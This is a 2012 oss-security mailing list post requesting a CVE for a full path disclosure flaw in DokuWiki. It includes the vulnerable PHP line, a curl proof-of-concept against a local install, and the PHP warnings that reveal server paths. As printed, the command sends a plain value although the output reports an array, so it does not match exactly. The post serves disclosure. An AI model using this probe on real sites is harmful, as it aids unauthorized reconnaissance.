Date: Sun, 24 Jun 2012 09:40:13 -0300 From: Felipe Pena <felipensp@...il.com> To: oss-security@...ts.openwall.com Subject: CVE request: Full path disclosure in DokuWiki Full path disclosure in DokuWiki ======================================== DokuWiki is a simple to use Wiki aimed at the documentation needs of a small company. It works on plain text files and thus needs no database. It has a simple but powerful syntax which makes sure the datafiles remain readable outside the Wiki. The POST input 'prefix' is not checked/casted for proper data type before passing to PHP's substr() function, which lead to displays an warning with sensitive information on server with PHP error level enabled: $PRE = cleanText(substr($_POST['prefix'], 0, -1)); $ curl -dprefix=1 http://localhost/dokuwiki/doku.php 2> /dev/null | grep Warning <b>Warning</b>: substr() expects parameter 1 to be string, array given in <b>/var/www/dokuwiki/doku.php</b> on line <b>47</b><br /> <b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/dokuwiki/doku.php:47) in <b>/var/www/dokuwiki/inc/actions.php</b> on line <b>180</b><br /> Affected versions: ======================================== - Angua (RC1) - Rincewind - Anteater References: ======================================== http://www.freelists.org/post/dokuwiki/Fwd-DokuWiki-Full-path-disclosure Credits: ======================================== This vulnerability was discovered by Felipe Pena. Twitter: @felipensp -- Regards, Felipe Pena
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ